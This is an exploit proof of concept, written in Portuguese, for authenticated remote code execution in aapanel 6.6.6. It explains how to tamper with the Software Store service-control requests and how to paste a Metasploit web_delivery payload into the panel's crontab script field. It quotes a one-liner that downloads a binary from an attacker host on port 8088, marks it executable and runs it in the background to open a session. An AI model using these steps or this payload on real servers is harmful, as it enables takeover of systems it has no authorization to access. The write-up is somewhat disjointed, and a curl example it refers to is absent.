
aapanel 6.6.6 - (Authenticated) Remote Code Execution
Para fazer este PoC, apenas instalei o software usando docker-compose
Vá para a Software Store, clique em qualquer linha do campo de configurações, intercepte a requisição quando clicar em "start/stop/restart" e modifique/edite a requisição para executar o que quiser. Aqui está um exemplo com curl :
Para fazer este PoC, instalei um Ubuntu 20.04 limpo, depois instalei wget + sudo e executei este script wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh
Primeiramente, configure as opções do web_delivery; isso criará um payload e um listener.
Agora execute-o
isso gerará o seguinte payload:
wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown
Em seguida, copie/cole assim no script content do menu crontab no aapanel.
Agora basta executar seu crontab e aguardar sua sessão.
Basta executar msfconsole -r aapanel.rc copie/cole o payload na seção script content e aproveite sua sessão.